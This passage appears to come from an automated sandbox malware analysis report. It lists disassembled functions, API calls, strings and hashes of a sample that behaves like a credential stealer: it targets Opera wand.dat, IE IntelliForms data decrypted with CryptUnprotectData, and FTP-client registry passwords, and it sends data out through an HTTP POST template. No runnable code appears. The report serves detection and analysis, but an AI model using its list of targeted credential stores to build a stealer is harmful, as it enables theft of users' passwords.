StrStrIA.SHLWAPI(?,opera,00000000,00414902,?,00414900,?,00000000,?), ref: 00408E94
FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408EC2
FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408ED5

Strings

opera, xrefs: 00408E89
\*.*, xrefs: 00408DD1
wand.dat, xrefs: 00408E9D

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*$opera$wand.dat
API String ID: 3663067366-3278183560
Opcode ID: cc25a33227bf8eb1f895c57babc8f57bd3b6ac3bcb532f689d68813b1a9d7db5
Instruction ID: 0b5b682e81162d08b085a00fa4b4687e521e2ccc034a3606a931e69e32089006
Opcode Fuzzy Hash: cc25a33227bf8eb1f895c57babc8f57bd3b6ac3bcb532f689d68813b1a9d7db5
Instruction Fuzzy Hash: D1314F71900219AADF61AB61CD02BEEB775AF54308F0440FBE54CB51E1DA788ED48F98

Function 00404426 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00404496
lstrcmpiA.KERNEL32(00414900,?), ref: 004044C3
lstrcmpiA.KERNEL32(00414902,?), ref: 004044E0
FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 004045AA
FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 004045BD

Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C

Strings

*.*, xrefs: 00404465
\*.*, xrefs: 00404456

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: e9ae95528873cf45815014cbf6bce20d71f811a676aa9b2c76d68bbdc6b83fe1
Instruction ID: 2b8e11bb01219329c343f90d65f401ade9b947c1a14df818a3a3490a176c20b7
Opcode Fuzzy Hash: e9ae95528873cf45815014cbf6bce20d71f811a676aa9b2c76d68bbdc6b83fe1
Instruction Fuzzy Hash: 70413EB1500209BBDF11AF61CC06BEE7769AF94308F1040B7BB18750F1D7798E919B59

Function 0040A9D6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0040A9E0
wsprintfA.USER32 ref: 0040AA5D
lstrlenW.KERNEL32(?,?), ref: 0040AAA3
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040AAE6
LocalFree.KERNEL32(00000000), ref: 0040AB1D

Strings

%02X, xrefs: 0040AA24, 0040AA54
Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040AA7B

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1926481713-2450551051
Opcode ID: ce5d445aa7dbbad832ed7abe80867de63fb84df2ba09d9b6e92dc2e79bfe537e
Instruction ID: a333c54da175db08d4beb54a880d019b2099c34658143f28011c69dd7b0ab911
Opcode Fuzzy Hash: ce5d445aa7dbbad832ed7abe80867de63fb84df2ba09d9b6e92dc2e79bfe537e
Instruction Fuzzy Hash: FF412B72C10218EADF119FA0DC05FEEBB79EF08314F14403AFA10B51A1E7799A61DB59

Function 004F00DB Relevance: 12.1, APIs: 8, Instructions: 149memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004F065F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,004F00F0), ref: 004F066C
Part of subcall function 004F065F: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000104), ref: 004F0696

SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 004F00FA
ReadFile.KERNEL32(00000000,?,?,?,?,00000000), ref: 004F010B
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 004F0110
VirtualProtect.KERNEL32(?,?,00000004,?,?), ref: 004F0145
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00000004,?,?), ref: 004F0155
VirtualProtect.KERNEL32(?,?,00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004), ref: 004F01A5
VirtualProtect.KERNEL32(00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004,?,?), ref: 004F01B3
VirtualFree.KERNELBASE(?,00004000,00000002,?,?,?,00000004,?,?), ref: 004F0216

Memory Dump Source

Source File: 00000000.00000002.2904362145.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f0000_pbfe2Xcxue.jbxd

Similarity

API ID: Virtual$Protect$File$AllocCloseCreateFreeHandlePointerRead
String ID:
API String ID: 2395391813-0
Opcode ID: ea589b0b73983e460bf43557bd5fc03f11857d5ef57e9652a38160b8af110ef1
Instruction ID: 00ddb1a515aae8e4eb995398f131cdc585d9fd7ef00bcc0d4f63a9a6b17590b2
Opcode Fuzzy Hash: ea589b0b73983e460bf43557bd5fc03f11857d5ef57e9652a38160b8af110ef1
Instruction Fuzzy Hash: D4419072200208AFDB109F65CC45E7A77A9FF84724F25444EFA058B253C775EC51CBA5

Function 00405478 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 004054E7
lstrcmpiA.KERNEL32(00414900,?), ref: 00405516
lstrcmpiA.KERNEL32(00414902,?), ref: 00405530
FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 00405588
FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 0040559B

Strings

\*.*, xrefs: 004054B6

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*
API String ID: 3663067366-1173974218
Opcode ID: ef0fbe648dd5950b6d42cea9b3198d230830f9ad383abd24334b68506a52d383
Instruction ID: 7e0189514424c7944c273d5ce23bde88461ff61316db25badbfa8ed08f785570
Opcode Fuzzy Hash: ef0fbe648dd5950b6d42cea9b3198d230830f9ad383abd24334b68506a52d383
Instruction Fuzzy Hash: 0E311A7181061DAADF21AB61CC06BEF7769EF14308F4040BAB90CA50F1E6788ED09F58

Function 0040AB37 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00415C64,00000000,00000005,00415C74,?), ref: 0040AB4F
StrStrIW.SHLWAPI(00000000,00415C94), ref: 0040ABC6
CoTaskMemFree.OLE32(00000000,00000000,00415C94), ref: 0040ABF1
CoTaskMemFree.OLE32(00000000,00000000,00000000,00415C94), ref: 0040ABFF

Strings

http://www.facebook.com/, xrefs: 0040AC1E
(, xrefs: 0040AB8B

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: FreeTask$CreateInstance
String ID: ($http://www.facebook.com/
API String ID: 2903366249-3677894361
Opcode ID: 3a66d303758c1357d4830ebb98179536296482120f459dea4ead343d77e1b8d3
Instruction ID: 1fa63d5eefd38a050360b30d01d12268977e5298d26fee42fb9246681ffbe078
Opcode Fuzzy Hash: 3a66d303758c1357d4830ebb98179536296482120f459dea4ead343d77e1b8d3
Instruction Fuzzy Hash: DB31FB70A04209EBEF11DF90CD89BCEFB75BF44308F248166E5007A291D3799AD5DB99

Function 004029B5 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004029F0
GetCurrentProcess.KERNEL32 ref: 004029FA
OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 00402A08
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00402A4A
CloseHandle.KERNEL32(00000000), ref: 00402A5E

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 3f05c3982a650b37c23475f6534c76ec1c630d9722eaeb3c0dcb334f148eab72
Instruction ID: 5b4abacae6c47807b72f7d9eb44744d900e200b0848b9b25bea25bf6b731d153
Opcode Fuzzy Hash: 3f05c3982a650b37c23475f6534c76ec1c630d9722eaeb3c0dcb334f148eab72
Instruction Fuzzy Hash: 22114C72A00209EBEF218F94DD4EBEEBBB5AB00708F108136A211B51D0D7F88685DF58

Function 0041087F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00410881
GetUserNameA.ADVAPI32(?,00000101), ref: 004108D4

Strings

cryptimplus, xrefs: 004108FC

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: InitializeNameUser
String ID: cryptimplus
API String ID: 2272643758-1201002197
Opcode ID: 7aad9943768656681877972dfde67bb428f4de76b68b4e3eee124481e3a883d4
Instruction ID: 846a3aad92cbda43a519cda982567d365da2cf2d7accc983c7590fc84842bfdd
Opcode Fuzzy Hash: 7aad9943768656681877972dfde67bb428f4de76b68b4e3eee124481e3a883d4
Instruction Fuzzy Hash: 43F0F4B1609201A9EB11BBBADE077CD39A49F1034CF04807BB115B91E2DAFD49C4D6AE

Function 00410949 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(0041090A), ref: 0041094E
RevertToSelf.ADVAPI32(?,?,0041090A), ref: 00410991

Strings

diamond, xrefs: 00410968

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: ExceptionFilterRevertSelfUnhandled
String ID: diamond
API String ID: 669012916-1381693260
Opcode ID: f50e416bd8ac59a79b7d46a167da7fee66e9d189a954c2d91d15bcb3ce08b3f7
Instruction ID: 2a6c495f0e8fcbc1f67cd432cca76d066b336a6ef08125a445b8c24b712f0a6e
Opcode Fuzzy Hash: f50e416bd8ac59a79b7d46a167da7fee66e9d189a954c2d91d15bcb3ce08b3f7
Instruction Fuzzy Hash: 0EE0EDB4540205EADB10BBE2E91B7CD3565AF4434CF11402FB51452197CFFC46C8DA6E

Function 00402514 Relevance: 3.0, APIs: 2, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 0040251D
GetProcAddress.KERNEL32(00000000,?), ref: 0040254B

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: a438bec78348ac7d54587d823988aef6f565806871fb1a07440a70bde571dc48
Instruction ID: 8c0463c41eb16a985e8fb0086ea0cfaf484124ef3f908e04b586e83b7918065b
Opcode Fuzzy Hash: a438bec78348ac7d54587d823988aef6f565806871fb1a07440a70bde571dc48
Instruction Fuzzy Hash: EBF0B4733041152AD7106939AC4999B6B88EBE33B8B105137F806B72C1E1BDDD86C3A8

Function 00403133 Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004030D3: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403118

recv.WSOCK32(?,?,00000001,00000000), ref: 00403165

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: 56b9539280dcd20de9aaf7895cab5ce372aa8c3703bcaa6a2f5f57fdf9e3e94a
Instruction ID: d001e1d827fc67b6fe399618d60d058818c6c1ba743e6e7188f86895497b48fe
Opcode Fuzzy Hash: 56b9539280dcd20de9aaf7895cab5ce372aa8c3703bcaa6a2f5f57fdf9e3e94a
Instruction Fuzzy Hash: BF01BC31340209BBDB109E51CC82B9E3B69AB1830AF108133B901BD2D5D3B9EB458759

Function 0040FC92 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

}H@, xrefs: 0040FCB3

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: }H@
API String ID: 0-3977553548
Opcode ID: c68f41f81983429f5a8ad830fc9e8a2afb7ea63f1d17de5f8559a072b33e4072
Instruction ID: 29df09d85e5e9c85869cd1640486071c566c2a58f5f72f8cacd3f28cd64a90cc
Opcode Fuzzy Hash: c68f41f81983429f5a8ad830fc9e8a2afb7ea63f1d17de5f8559a072b33e4072
Instruction Fuzzy Hash: 0C11EF71604188EFDB329B14CC02B9A7FB5EB41704F158033E803A5DE2C73D8956D609

Function 00405C62 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405D02
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405D32
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405D80

Strings

Last Server Pass, xrefs: 00405CE5
Port, xrefs: 00405C7A
Server Type, xrefs: 00405C70
Host, xrefs: 00405C84
Last Server User, xrefs: 00405CDB
Path, xrefs: 00405CA3
User, xrefs: 00405C7F
Last Server Type, xrefs: 00405CCC
Server.Host, xrefs: 00405CB2
Server.Port, xrefs: 00405CA8
Pass, xrefs: 00405C89
Last Server Path, xrefs: 00405CD1
Last Server Port, xrefs: 00405CD6
Remote Dir, xrefs: 00405C75
ServerType, xrefs: 00405C9E
Server.User, xrefs: 00405CAD
Last Server Host, xrefs: 00405CE0
Server.Pass, xrefs: 00405CB7

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
API String ID: 1332880857-44262141
Opcode ID: df1eb648c298e9ec259796396ccae5e9430f32d9208ff850baed2ea8562c31e7
Instruction ID: 8e4f353a72aa291d62cd9fd792fc73201ed9e3ce88c61fdab07ab4323d85dcc7
Opcode Fuzzy Hash: df1eb648c298e9ec259796396ccae5e9430f32d9208ff850baed2ea8562c31e7
Instruction Fuzzy Hash: BE210A75680308BADF116A90CC06FDE7A76BB84B08F208067B514750E1DAB96AD5AF8C

Function 004020F7 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00402164
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004021A4
lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402257
lstrlenA.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402290

Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 004022C7
GetHGlobalFromStream.OLE32(?,?,?,?), ref: 004022F3
GlobalLock.KERNEL32(?), ref: 00402323
GlobalUnlock.KERNEL32(?), ref: 00402342
GetHGlobalFromStream.OLE32(?,?,?,?,?,?), ref: 00402354
GlobalLock.KERNEL32(?), ref: 00402384
GlobalUnlock.KERNEL32(?), ref: 004023A3

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

Strings

DisplayName, xrefs: 0040222C
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0040215A, 004021B6
UninstallString, xrefs: 004021EC

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Global$FromLocalLockStreamUnlocklstrlen$AllocCloseEnumFreeOpen
String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 4234118056-981893429
Opcode ID: 1f3f8d0062e11a61bab0ff8ab5fe8b3f08d8182dde7c7ca9f8716c5caf8c2a4a
Instruction ID: d171737467ef451fc826e3d579c9997d64fcde793b4b3b382e0925c89acd1817
Opcode Fuzzy Hash: 1f3f8d0062e11a61bab0ff8ab5fe8b3f08d8182dde7c7ca9f8716c5caf8c2a4a
Instruction Fuzzy Hash: 8D615071800158BADF31AB61CD06BEA7679AF54348F1040FBB588B11E1D7BD5EC4AF68

Function 004036C0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 156
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919

InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403747
InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403772
InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 004037B8
ObtainUserAgentString.URLMON(00000000,?,00001000), ref: 004037D5
wsprintfA.USER32 ref: 004037F2
wsprintfA.USER32 ref: 00403812

Part of subcall function 00403692: setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 004036B7

lstrlenA.KERNEL32(?,00001000,00001000,00001000,00001000), ref: 0040383D
closesocket.WSOCK32(?,?,00001000,00001000,00001000,00001000), ref: 00403888

Strings

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0), xrefs: 004037FC
<, xrefs: 00403792
POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s, xrefs: 004037EA, 0040380A

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Internet$Crackwsprintf$AgentAllocCreateLocalObtainStringUserclosesocketlstrlensetsockopt
String ID: <$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s
API String ID: 963220733-2459402781
Opcode ID: e79ed7982b9715bd807d4a697f38f7c57ad1aa53513f8986cef2c93f6d550a38
Instruction ID: e96a955cf126575970a76a31bb9ed4e339ea21d969e4ba4c8af83a38dc8d532d
Opcode Fuzzy Hash: e79ed7982b9715bd807d4a697f38f7c57ad1aa53513f8986cef2c93f6d550a38
Instruction Fuzzy Hash: 215129B2D00209EADF11AFD1CC42BEDBFB9AF0434AF10803AF511B51A1DB795A55EB19

Function 00402C53 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

S-1-5-18, xrefs: 00402D0F

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: S-1-5-18
API String ID: 0-4289277601
Opcode ID: fecfbf39c9fa297d2a5b5898ffbabddf70c1d30136d3b9b2a810340c282c9ef3
Instruction ID: 42faedd81632fe65e7b373b3e490078558f195fb403373b35b5c805c479cc830
Opcode Fuzzy Hash: fecfbf39c9fa297d2a5b5898ffbabddf70c1d30136d3b9b2a810340c282c9ef3
Instruction Fuzzy Hash: 84218336900209BBEF119FE0DD8ABEE7B76AF40704F148576A511B51E1D7B98E90DB08

Function 0040695B Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406971
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004069A5
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406BD8

Strings

PasswordType, xrefs: 00406A9D
InitialPath, xrefs: 00406A36
Password, xrefs: 004069DC
Host, xrefs: 004069FA
Login, xrefs: 00406A18
Port, xrefs: 00406A59

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$InitialPath$Login$Password$PasswordType$Port
API String ID: 1332880857-4069465341
Opcode ID: 17a11e2314c8ff3581a4348192fce24d478644d80a43437b46957cdbfdb4abd3
Instruction ID: 563070ecf5fa897b10cbf2f3789db8db7108632a7b41965fe05ac691b7915a77
Opcode Fuzzy Hash: 17a11e2314c8ff3581a4348192fce24d478644d80a43437b46957cdbfdb4abd3
Instruction Fuzzy Hash: 20512871900128EADF21AB50CC05BDD7AB9BF44308F05C0FAA559700A1DB7A5EE6DF98

Function 0040D330 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D343
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D377
